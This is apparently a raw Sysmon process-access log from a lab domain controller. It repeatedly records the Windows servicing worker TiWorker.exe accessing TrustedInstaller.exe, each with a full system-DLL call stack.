13:58:31.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011538Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.148{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.133{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.117{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.101{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.101{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.101{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.086{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1